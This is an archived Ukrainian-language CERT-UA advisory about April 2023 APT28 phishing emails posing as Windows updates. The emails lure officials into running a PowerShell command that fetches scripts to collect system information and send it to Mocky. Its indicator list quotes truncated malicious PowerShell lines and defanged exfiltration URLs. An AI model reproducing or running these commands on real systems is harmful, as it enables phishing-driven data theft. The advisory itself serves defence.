CERT-UA
Archived: 2026-04-10 03:07:07 UTC
Загальна інформація
Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA протягом квітня 2023
року зафіксовано випадки розповсюдження серед державних органів України електронних листів з темою
"Оновлення Windows", надісланих, начебто, від імені системних адміністраторів відомств. При цьому
електронні адреси відправників, створені на публічному сервісі "@outlook.com", можуть формуватися з
використанням справжнього прізвища та ініціалів співробітника.
Типовий лист містить "інструкцію" українською мовою щодо "оновлення для захисту від хакерських атак",
а також графічні зображення процесу запуску командного рядка та виконання PowerShell-команди.
Згадана команда завантажить PowerShell-сценарій, який, імітуючи процес оновлення операційної системи,
забезпечить завантаження й виконання наступного PowerShell-сценарію, призначеного для збору базової
інформації про ЕОМ за допомогою команд "tasklist", "systeminfo", а також відправку отриманих результатів
за допомогою HTTP запиту до API сервісу Mocky.
Рекомендуємо обмежити можливість запуску PowerShell користувачами та забезпечити моніторинг
мережевих з'єднань до API сервісу Mocky.
Активність здійснюється групою APT28.
Індикатори кіберзагроз
Хостові:
powershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?upd
powershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?upd
powershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?upd
Мережеві:
146[.]70.105.61 (@m247.ro)
77[.]75.78.125 (Received)
hXXp://mockbin[.]org/bin/4aa17a07-7635-4ee0-9f3a-449fcd91f342
hXXp://mockbin[.]org/bin/e8bfd045-2b14-4afc-9372-b723f7d76918
hXXp://mockbin[.]org/bin/b8427b58-7497-46cd-a5b2-6ff6a40b4592
hXXp://run.mocky[.]io/v3/1e88179a-3105-4a5c-9eb3-aebea36e9c21
hXXp://run.mocky[.]io/v3/3b44f33d-b6e5-4ec6-b120-99b6ac52f74b
hXXp://run.mocky[.]io/v3/a4b6625c-226e-4dbc-baec-1dbd854b8015
hXXp://run.mocky[.]io/v3/acea62da-ca05-46d1-bb80-0b036af7467c
https://cert.gov.ua/article/4492467
Page 1 of 2

hXXp://run.mocky[.]io/v3/ef206b51-4cf4-4c93-90bf-1e66673315b0
hXXp://run.mocky[.]io/v3/ef4c7798-fc09-42cd-8431-91a22d5728d9
hXXp://run.mocky[.]io/v3/a261411d-b869-4877-86f5-307e32ed6afa
mockbin[.]org (Легітимний сервіс Mocky)
run.mocky[.]io (Легітимний сервіс Mocky)
Графічні зображення
Source: https://cert.gov.ua/article/4492467
https://cert.gov.ua/article/4492467
Page 2 of 2